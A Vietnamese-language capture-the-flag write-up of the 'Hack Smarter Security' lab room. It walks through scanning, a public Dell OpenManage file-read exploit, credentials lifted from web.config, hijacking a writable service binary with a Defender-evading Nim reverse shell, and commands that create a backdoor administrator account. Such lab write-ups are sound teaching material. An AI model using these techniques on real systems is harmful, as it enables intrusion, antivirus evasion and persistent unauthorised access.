Hack Smarter Security

Can you hack the hackers?

November 4, 2025 • September 1, 2025 • Medium

Author

Hung Nguyen Tuong

Initial Reconnaissance

Chúng ta thêm dòng sau vào /etc/hosts để ánh xạ domain name.

10.10.71.186 hss.thm

Service Scanning

┌──(hungnt㉿kali)-[~/Documents]
└─$ rustscan -a hss.thm -r 1-65535 -- -sV -sC

PORT     STATE    SERVICE       REASON          VERSION
21/tcp   open     ftp           syn-ack ttl 125 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
|_06-28-23  03:00PM              1022126 stolen-passport.png
22/tcp   open     ssh           syn-ack ttl 125 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBQEQMtEIvOihpoAKa9mb4xibUA3epuSK6Rxxs+DoZW3vnh+jS+sRfqlylP7y/n4IzGUuaWlZVKpUq7BpYWy+b6CUQG59eniRhqIbPnQMxgj10aGNB2cwSWJiw7eHL5ifWJpPzhcESEpIo+y7DtWPffqWxU/nVp1gTc9Yq9SrumwiFuzT+CV1MzyMBuqqlhydQ2bmRKY8OPBylO1IfB0vUmttRekXQv5Hzj8+EuY9AyR1Dd/VIPyTAu6azseLp+XRkmbj/SDFCyVFzmcJWrd0U1TRO9JgyqMqpJ1sXaLdLvhN6cF8+TgvQrzIHktXcuuYs0VTxOcGLT6rxgTjvI4SR
|   256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLo3VekZ7ilJh7VVErMMXBCMy6+xLbnG+S3p4AGRj+CYOojmR0hZcEC6m/bk/4wZbI8hqfi7WXkHzb9k229IAwM=
|   256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKrfRbBfOafQZpZ/1PAOouyK5o+rG5uKKPllhZk91Q+m
80/tcp   open     http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: HackSmarterSec
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open     ssl/rxmon?    syn-ack ttl 125
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US/localityName=Round Rock/organizationalUnitName=SA Enterprise Software Development
| Issuer: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US/localityName=Round Rock/organizationalUnitName=SA Enterprise Software Development
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-30T19:03:17
| Not valid after:  2025-06-29T19:03:17
| MD5:   4276:b53d:a8ab:fa7c:10c0:1535:ff41:2928
| SHA-1: c44f:51f8:ed54:802f:bb94:d0ea:705d:50f8:fd96:f49f
| -----BEGIN CERTIFICATE-----
| MIIDtjCCAp6gAwIBAgIJAJiVCPPKPIZQMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD
| VQQGEwJVUzELMAkGA1UECBMCVFgxEzARBgNVBAcTClJvdW5kIFJvY2sxKzApBgNV
| BAsTIlNBIEVudGVycHJpc2UgU29mdHdhcmUgRGV2ZWxvcG1lbnQxETAPBgNVBAoT
| CERlbGwgSW5jMRcwFQYDVQQDEw5oYWNrc21hcnRlcnNlYzAeFw0yMzA2MzAxOTAz
| MTdaFw0yNTA2MjkxOTAzMTdaMIGIMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVFgx
| EzARBgNVBAcTClJvdW5kIFJvY2sxKzApBgNVBAsTIlNBIEVudGVycHJpc2UgU29m
| dHdhcmUgRGV2ZWxvcG1lbnQxETAPBgNVBAoTCERlbGwgSW5jMRcwFQYDVQQDEw5o
| YWNrc21hcnRlcnNlYzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAID1
| 0qf1d/s31Fj8jgv7MtEHjRYX41B+o2p4M5TEIw3kWGrZmfxasZb7KP8lCKcS1+2x
| U08mCd2k0OfnGaeJIqnnzrQlkjhM/EVC+6LXOnC65rpaAmZXeKuH0YzFKSbmSt5k
| 7iTFoYH/QPLKn/lXxlCl4y4x73pCvttLOKtqcoO0a1Rf67kCnHuaRGVfWlidsUYe
| AIWsP8sq/kx+AhOTv4WRK/2Dx51emAguT8167rfiUbu9o6cf0hGhvO9V/d9SLcht
| sF8KVlAYZLHo6Vyzxf412+L2DrxqZoF6v3T8srvj4WMHt8m3lbyxizE68TCmQXzD
| SWoUUhpcv8xQBVCp860CAwEAAaMhMB8wHQYDVR0OBBYEFOADAwMC1j6Zrd4r+sYx
| V7aussbQMA0GCSqGSIb3DQEBCwUAA4IBAQBHVVuwnRybQn2lgUXjQVDWNDhTyV8h
| eKX78tuO/zLOO9H+QvtHnA293NEgsJ1B2hyM+QIfhPxB+uyAh9qkYLwwNWzT5M7i
| JZW2b00Q7JJhyF5ljU6+cQsIc2e9c6ohpka/2YOso18b0McJNZULEf1bkXAgCVFK
| /VUpZqbOUwze/Zyh/UCTY3yLmxmMzkRHIUSCNh7rdi5Rtv/ele0WICTD0eX1Hw0b
| DaUifmqUEI4Lh3SemL5MolJ0FpRrBNznNmWR9xwOFCE1dSaYj8Zo0oaIgJEbkffh
| 9k72dU9PVPMx+kqDak7ntWQHTFuV6GH149dIUPinVmioLAkxPJ2XmoRt
|_-----END CERTIFICATE-----
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Tue, 02 Sep 2025 08:00:20 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|     <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Tue, 02 Sep 2025 08:00:27 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|_    <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
3389/tcp open     ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-09-02T08:01:28+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HACKSMARTERSEC
|   NetBIOS_Domain_Name: HACKSMARTERSEC
|   NetBIOS_Computer_Name: HACKSMARTERSEC
|   DNS_Domain_Name: hacksmartersec
|   DNS_Computer_Name: hacksmartersec
|   Product_Version: 10.0.17763
|_  System_Time: 2025-09-02T08:01:18+00:00
| ssl-cert: Subject: commonName=hacksmartersec
| Issuer: commonName=hacksmartersec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-01T07:53:51
| Not valid after:  2026-03-03T07:53:51
| MD5:   0e72:c25f:6a52:6317:c5b5:01d3:bb59:d12a
| SHA-1: 7a06:eb1b:f52c:5bfc:c6b6:5a29:94b3:25a6:62a4:c9ec
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcigAwIBAgIQFISOuLW+xKtOtqOuf20LLDANBgkqhkiG9w0BAQsFADAZ
| MRcwFQYDVQQDEw5oYWNrc21hcnRlcnNlYzAeFw0yNTA5MDEwNzUzNTFaFw0yNjAz
| MDMwNzUzNTFaMBkxFzAVBgNVBAMTDmhhY2tzbWFydGVyc2VjMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9/v/4gXu+18+B0mu52E5+8EdXj5FsdMqTYyZ
| vCiZviE5TPptEZWlyq2h3Jd4MdTnUQ/Tzm3O49/feoSzJw8BGRPNSv2LG1qCvXVU
| BZJr+XK52b3eRbi/QgHmSzd6zaorfEopnECgd/32d57gcZgKUYXFg9N5Oox6I4KT
| ZA1SYYvD5XZnKN062ENH1456asEjoKHhszIZMbuh0rzq73wzLdBP6ylXX8I/tKEj
| 74/77YmqaxTcLznEeZsoPxMeuZczLhEe04sDaQ7PSpNP7Lwe2yTRaygQBQodAjy2
| LxXwu0P3tLv4K2UaoGK+Pp3vIccdkRBxyvU1jTCPYkRl/Pum9QIDAQABoyQwIjAT
| BgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQAD
| ggEBADczgALmJ3YFG8vsAmaDKLWebJtd07Tt87B0DGlNvuIV9nJywND8QATGWWQ5
| C1piMhWpnxlJkGUg37WNyhTXdZ1eXoR0C+vWucQ4UZzDOOHWYeh/lJL2RyAXXeYS
| 5k9v6gnOanC5vLEvgcBEXR6bx3N4QGX4tuem2G3OzkSpa2u+7s5BjQ5V93i73CdV
| +Hc9qWxSu1Nh6Qrp2DDelCwj6sEDQ5s3J+nQN7BI4d+MIQ0MIDHpUt63Va5OR6cO
| uxDNbVeQlsZulEIHev7JXLuK5mKMmO7CaxBh/kq3qut1rHY1Xn9oI8c3Pc2jhe8y
| WmUbTcqubOOrHB41NRm6j2hgcAw=
|_-----END CERTIFICATE-----
7680/tcp filtered pando-pub     no-response

Từ kết quả scan, chúng ta thấy nhiều service quan trọng. Port 21 đang mở FTP trên Windows_NT, cho phép anonymous login và chứa hai file nhạy cảm. Port 22 mở SSH với OpenSSH cho Windows. Port 80 chạy web server Microsoft IIS 10.0. Đáng chú ý, port 1311 có service lạ nhưng thực chất trả là HTTPS. Ngoài ra, port 3389 mở Remote Desktop (RDP).

FTP 21

Theo kết quả từ Nmap, dịch vụ FTP cho phép truy cập ẩn danh.

Khi kết nối vào, chúng ta tìm thấy 2 file trên server. Để có thể tải xuống file hình ảnh, chúng ta cần chuyển sang chế độ binary.

Sau khi kiểm tra, một file chứa đầy thông tin thẻ tín dụng, nhưng tất nhiên tất cả đều là giả.

┌──(hungnt㉿kali)-[~/Desktop]
└─$ cat Credit-Cards-We-Pwned.txt                                                                         
VISA, 4929012623542946, 8/2027, 273
VISA, 4556638818403096, 8/2024, 166
VISA, 4024007166395359, 12/2027, 209
VISA, 4485714082654957, 12/2028, 834
VISA, 4716405563341310, 12/2023, 235
VISA, 4556430097066053, 7/2030, 493
VISA, 4916389512648686, 10/2026, 269
VISA, 4532953400107172, 8/2026, 862
VISA, 4485122260041080, 11/2024, 446
VISA, 4485650070135122, 5/2027, 411
VISA, 4916828190458462, 4/2029, 859
VISA, 4532452179409778, 7/2028, 450
VISA, 4532676678238045, 11/2030, 521
VISA, 4539865157272244, 8/2029, 452
VISA, 4916271858910955, 9/2026, 671
VISA, 4532317257711629, 7/2027, 867
VISA, 4916165338323542, 2/2023, 361
VISA, 4760461258276522, 2/2025, 492
VISA, 4916725323150737, 10/2030, 226
VISA, 4532834873682299, 3/2028, 700
VISA, 4929191703053576, 1/2026, 294
VISA, 4539698655135211, 11/2026, 199
VISA, 4024007102813655, 2/2024, 370
VISA, 4539420298777113, 2/2025, 335
VISA, 4532005568344103, 4/2026, 862
VISA, 4532063243654230, 6/2026, 334
VISA, 4485150732825871, 2/2024, 621
VISA, 4442679511790437, 6/2027, 353
VISA, 4485795891608045, 9/2029, 331
VISA, 4532568184243454, 8/2024, 663
VISA, 4929542676935225, 1/2026, 297
VISA, 4539861652328540, 11/2025, 586
VISA, 4024007195803530, 3/2029, 763
VISA, 4556507563599954, 10/2023, 637
VISA, 4716769283740741, 1/2023, 827
VISA, 4916860170619524, 8/2027, 819
VISA, 4916815465532006, 9/2025, 892
VISA, 4539073124117242, 9/2030, 247
VISA, 4539112760330683, 7/2024, 472
VISA, 4556618069642766, 12/2026, 389
VISA, 4929084109256572, 7/2024, 612
VISA, 4539625719273613, 3/2023, 480
VISA, 4114917233588557, 4/2027, 168
VISA, 4485603151004584, 7/2029, 948
VISA, 4024007186963137, 6/2029, 851
VISA, 4532814962965771, 6/2029, 200
VISA, 4539057462755028, 3/2028, 497
VISA, 4539525104418940, 7/2028, 297
VISA, 4024007110217774, 11/2030, 834
VISA, 4716822993656648, 5/2027, 501
VISA, 4929710624081919, 10/2026, 476
VISA, 4485629234919860, 7/2024, 606
VISA, 4929747699427742, 10/2028, 455
VISA, 4485527005877244, 3/2026, 428
VISA, 4485653383131309, 5/2024, 113
VISA, 4929024678349143, 9/2026, 251
VISA, 4916200663036144, 4/2023, 830
VISA, 4539456079209793, 8/2024, 254
VISA, 4916873802076641, 11/2026, 293
VISA, 4380975924136539, 9/2024, 321
VISA, 4696130499141865, 1/2025, 363
VISA, 4716457932863524, 8/2029, 765
VISA, 4532756287520734, 11/2025, 852
VISA, 4916527870620819, 7/2026, 907
VISA, 4793993233589190, 6/2028, 612
VISA, 4539756518688584, 5/2029, 963
VISA, 4024007100837581, 3/2029, 708
VISA, 4929589608839959, 9/2023, 652
VISA, 4212739323137561, 11/2029, 476
VISA, 4532614050967501, 3/2023, 914
VISA, 4024007141284124, 5/2026, 389
VISA, 4539772921551251, 11/2025, 618
VISA, 4539450037070926, 8/2027, 948
VISA, 4916814132386979, 5/2024, 593
VISA, 4539185905840451, 12/2029, 292
VISA, 4532671500927097, 8/2023, 385
VISA, 4916296276573424, 2/2030, 595
VISA, 4539929964730669, 2/2028, 608
VISA, 4916927793505487, 5/2029, 241
VISA, 4532046660465495, 2/2029, 956
VISA, 4347329383965909, 10/2028, 519
VISA, 4716115891775226, 3/2027, 546
VISA, 4532137397420372, 2/2024, 187
VISA, 4820824902294423, 8/2030, 942
VISA, 4916094483568000, 4/2023, 452
VISA, 4539421464241934, 10/2030, 600
VISA, 4929689135996049, 7/2024, 774
VISA, 4929847240492292, 3/2026, 295
VISA, 4556311843829186, 11/2024, 945
VISA, 4539781087867344, 5/2025, 971
VISA, 4916484095195682, 5/2029, 284
VISA, 4556503141065253, 8/2029, 272
VISA, 4024007143396546, 6/2026, 203
VISA, 4929721498547653, 7/2025, 599
VISA, 4916942096298268, 6/2024, 682
VISA, 4539718043028173, 8/2024, 441
VISA, 4532334274894171, 3/2026, 148
VISA, 4916116415203198, 9/2023, 942
VISA, 4024007188842941, 4/2028, 755
VISA, 4716859507682660, 5/2029, 424

Còn file kia thì lại…

Tiếp theo, chúng ta thử xem liệu có thể upload file lên server qua FTP hay không?

Ta không có quyền làm vậy.

HTTP 80

Trang web chính không hiển thị gì hữu ích. Vì vậy, chúng ta chạy ffuf để scan các thư mục và file ẩn trên website.

Directory Enumeration

┌──(hungnt㉿kali)-[~/Desktop]
└─$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://hss.thm/FUZZ -r -e .php,.txt,.html,.aspx -fc 403 -t 100

`/superadmin.html`

File này trông có vẻ khá thú vị. Tuy nhiên,…

HTTPS 1311

Khi truy cập cổng 1311, chúng ta thấy rằng dịch vụ yêu cầu TLS, vì vậy cần dùng HTTPS thay vì HTTP.

Sau đó, ta được chuyển hướng đến trang đăng nhập của Dell OpenManage Server Administrator. Việc đầu tiên nên làm là kiểm tra xem có tồn tại credentials mặc định nào cho ứng dụng này hay không.

Tuy nhiên, kết quả cho thấy ứng dụng không có credentials mặc định.

Điều duy nhất đáng chú ý ở đây là trang About, nơi tiết lộ phiên bản đang chạy là 9.4.0.2.

Arbitrary File Read

Tiếp theo, chúng ta thử tìm kiếm các lỗ hổng hoặc exploit công khai cho ứng dụng này.

Các phiên bản trước 9.4.0.0 tồn tại lỗ hổng Arbitrary File Read (CVE-2020-5377), được phát hiện bởi Rhino Security Labs.

Tuy nhiên, vì ở đây là phiên bản 9.4.0.2, nên exploit cũ có thể không hoạt động. Ta cùng đọc bài viết về lỗ hổng này của tác giả:

CVE-2020-5377: Dell OpenManage Server Administrator File Read

Rhino Security Labs

Khi đọc kỹ hơn, chúng ta biết rằng 9.4.0.2 đã triển khai bản vá cho CVE-2020-5377, nhưng sau đó lại bị bypass bởi CVE-2021-21514. May mắn là tác giả cũng cung cấp exploit đã được chỉnh sửa để hoạt động với phiên bản này.

github.com/RhinoSecurityLabs/CVEs/blob/master/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py

Sau khi tải xuống và chạy exploit, chúng ta tạo được một session thành công. Vấn đề tiếp theo là: làm sao biết được file nào cần đọc?

Ta tham khảo HackTricks:

Path Traversal | IIS | HackTricks

Ta biết rằng các file nhạy cảm cần đọc bao gồm web.config, global.asax, và connectionstrings.config. Nhưng câu hỏi đặt ra là: vị trí chính xác của chúng nằm ở đâu?

Ta tiếp tục đọc bài viết này.

web.config thường nằm trong thư mục C:\inetpub\wwwroot\application_name\.

Và nhìn lại kết quả scan từ Nmap, ta có thể dự đoán application_name ở đây là hacksmartersec:

80/tcp   open     http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: HackSmarterSec

<add key="Username" value="tyler" />
<add key="Password" value="IAmA1337h4x0randIkn0wit!" />

Sau khi đọc file web.config, chúng ta phát hiện được credentials của user tyler.

Thử sử dụng credentials này để đăng nhập vào Dell OpenManage Server nhưng không thành công.

Tiếp tục thử với dịch vụ RDP, nhưng kết quả cũng không thành công.

Shell as `tyler`

Nhớ lại kết quả Nmap trước đó, chúng ta thấy có một dịch vụ SSH đang chạy, điều này khá bất thường đối với một máy Windows. Đây có thể là lựa chọn duy nhất còn lại để thử đăng nhập bằng credentials đã tìm thấy.

Chúng ta đã đăng nhập thành công. Tiếp theo, chúng ta cần tìm file user.txt.

`user.txt`

tyler@HACKSMARTERSEC C:\Users\tyler>dir 
 Volume in drive C has no label.                   
 Volume Serial Number is A8A4-C362                 
                                                   
 Directory of C:\Users\tyler                       
                                                   
06/30/2023  07:10 PM    <DIR>          .           
06/30/2023  07:10 PM    <DIR>          ..
06/30/2023  07:10 PM    <DIR>          3D Objects
06/30/2023  07:10 PM    <DIR>          Contacts
06/30/2023  07:12 PM    <DIR>          Desktop
06/30/2023  07:10 PM    <DIR>          Documents
06/30/2023  07:10 PM    <DIR>          Downloads
06/30/2023  07:10 PM    <DIR>          Favorites
06/30/2023  07:10 PM    <DIR>          Links
06/30/2023  07:10 PM    <DIR>          Music
06/30/2023  07:10 PM    <DIR>          Pictures
06/30/2023  07:10 PM    <DIR>          Saved Games
06/30/2023  07:10 PM    <DIR>          Searches
06/30/2023  07:10 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  14,112,923,648 bytes free

tyler@HACKSMARTERSEC C:\Users\tyler>cd Desktop

tyler@HACKSMARTERSEC C:\Users\tyler\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\tyler\Desktop

06/30/2023  07:12 PM    <DIR>          .
06/30/2023  07:12 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/27/2023  09:42 AM                25 user.txt
               3 File(s)          1,106 bytes
               2 Dir(s)  14,112,923,648 bytes free

tyler@HACKSMARTERSEC C:\Users\tyler\Desktop>type user.txt
THM{4ll15n0tw3llw1thd3ll}

User Information

Sau khi kiểm tra, không có gì đặc biệt về user này.

Protection

Chúng ta thử khởi chạy một session Powershell để kiểm tra trạng thái của Windows Defender. Tuy nhiên, user hiện tại không có quyền để thực hiện việc này.

System Information

Kiểm tra thông tin hệ thống, chúng ta xác định máy đang chạy Windows Server 2019 Datacenter, version 1809, với build 10.0.17763.

WinPEAS

Vì chưa xác định được Windows Defender có bật hay không bằng Get-ComputerStatus, chúng ta thử upload và chạy WinPEAS để enumerate vector leo quyền.

Tuy nhiên, winpeas.exe ngay lập tức bị xóa. Điều này xác nhận rằng Windows Defender đang được bật.

Vậy nên, chúng ta không thể sử dụng các script hay payload độc hại, bao gồm cả payload tạo từ msfvenom hay nhiều công cụ leo quyền phổ biến khác. Lúc này, cách duy nhất là tiến hành enumerate thủ công.

PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/14/2018   6:56 AM                EFI
d-----        6/30/2023   6:47 PM                inetpub
d-----        6/30/2023   6:41 PM                OpenManage
d-----        5/13/2020   5:58 PM                PerfLogs
d-r---        6/30/2023   6:44 PM                Program Files
d-----        6/30/2023   6:57 PM                Program Files (x86)
d-r---        6/30/2023   7:10 PM                Users
d-----        6/30/2023   6:47 PM                Windows

Chúng ta chưa tìm được gì cả. Ta thử kiểm tra các process đang chạy thì sao?

Service Binary Hijacking

Trong danh sách process, chúng ta phát hiện một process có tên đáng ngờ là spoofer-scheduler.

Khi thử tìm đường dẫn của executable bằng Powershell thì không thấy kết quả.

PS C:\Users\tyler> (Get-Process -Name "spoofer-scheduler").Path
PS C:\Users\tyler>

Tuy nhiên, dựa vào chữ “scheduler” trong tên, chúng ta đoán rằng đây có thể là một service.

PS C:\Users\tyler> sc.exe qc spoofer-scheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: spoofer-scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Spoofer Scheduler
        DEPENDENCIES       : tcpip
        SERVICE_START_NAME : LocalSystem

Sau khi kiểm tra, đúng là nó đang chạy dưới dạng service và executable nằm trong C:\Program Files (x86)\Spoofer\. Quan trọng hơn, service này có SERVICE_START_NAME là LocalSystem.

PS C:\Users\tyler> cd "C:\Program Files (x86)\Spoofer\"
PS C:\Program Files (x86)\Spoofer> dir


    Directory: C:\Program Files (x86)\Spoofer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        7/16/2020   7:23 PM           7537 firewall.vbs
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        7/20/2020  11:12 PM         575488 scamper.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        7/24/2020   9:31 PM        8307640 spoofer-scheduler.exe
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

Nếu chúng ta có thể ghi đè spoofer-scheduler.exe, chúng ta sẽ leo quyền thành LocalSystem.

Kiểm tra quyền trên thư mục, ta thấy user tyler thuộc nhóm Users trong domain BUILTIN, và có full permissions (F) trên thư mục này. Điều này có nghĩa là ta hoàn toàn có thể hijack executable file này và chạy nó với quyền LocalSystem.

Do Windows Defender đã bật, chúng ta không thể đơn giản upload một payload msfvenom. Nhưng vẫn còn một hướng khác có thể khai thác.

Shell as `SYSTEM`

With Nim Reverse Shell

Chúng ta sẽ sử dụng một reverse shell viết bằng Nim, có khả năng bypass Windows Defender:

Nim Reverse Shell

GitHub

Vì Windows Server 2019 (10.0.17763) thuộc cùng họ kernel với Windows 10 (10.0.19045) và Windows 11 (10.0.22621), đồng thời máy này không có kết nối internet nên Windows Defender chưa được cập nhật bản vá mới nhất. Do đó, reverse shell này sẽ hoạt động trong trường hợp của chúng ta.

Trước hết ta cài đặt Nim lang:

Chúng ta tải xuống source code của reverse shell Nim và chỉnh sửa lại để sử dụng IP và port của mình.

Ta tiến hành biên dịch source code thành file spoofer-scheduler.exe bằng command:

┌──(hungnt㉿kali)-[~/Desktop]
└─$ nim c -d:mingw --app:gui -o:spoofer-scheduler.exe rev_shell.nim

Tiếp theo, ta chuyển file này sang máy target.

Sau đó, chúng ta khởi động lại service spoofer-scheduler.

Kết quả là một reverse shell được thiết lập thành công với quyền SYSTEM, cho phép ta chiếm toàn quyền trên hệ thống. Tuy nhiên, kết nối này không duy trì được lâu vì service thường bị treo sau khoảng 30 giây, khiến Service Control Manager coi nó như lỗi timeout và tự động kết thúc process.

Để duy trì quyền truy cập, cách an toàn hơn là cài đặt một backdoor bằng cách tạo một user mới với full quyền. Chúng ta có thể thực hiện điều này bằng 2 command sau:

net user hacker Password@123! /add

net localgroup Administrators hacker /add

Sau đó, chúng ta có thể SSH vào máy bằng tài khoản vừa tạo để duy trì truy cập ổn định.

`hacking-targets.txt`

hacker@HACKSMARTERSEC C:\>cd Users

hacker@HACKSMARTERSEC C:\Users>tree /f /a .
Folder PATH listing 
Volume serial number is A8A4-C362
C:\USERS
+---Administrator
|   +---3D Objects
|   +---Contacts
|   +---Desktop
|   |   |   EC2 Feedback.website
|   |   |   EC2 Microsoft Windows Guide.website
|   |   |
|   |   \---Hacking-Targets
|   |           hacking-targets.txt
|   |
|   +---Documents
|   +---Downloads
|   |   |   bootstrap-4.3.1-dist.zip
|   |   |
...

hacker@HACKSMARTERSEC C:\Users>type Administrator\Desktop\Hacking-Targets\hacking-targets.txt
Next Victims:  
CyberLens, WorkSmarter, SteelMountain

With PS2EXE

Có một cách khác để leo quyền là sử dụng PS2EXE. Công cụ này cho phép chúng ta biên dịch một PowerShell script thành file thực thi .exe, đúng như cái tên của nó. Điểm quan trọng ở đây là Windows Defender không coi file thực thi này là mối đe dọa, nhờ đó chúng ta có thể né tránh được.

Module PS2EXE có thể tìm thấy tại:

PS2EXE | GitHub

Module to compile powershell scripts to executables

Quá trình cài đặt yêu cầu một phiên PowerShell với quyền quản trị.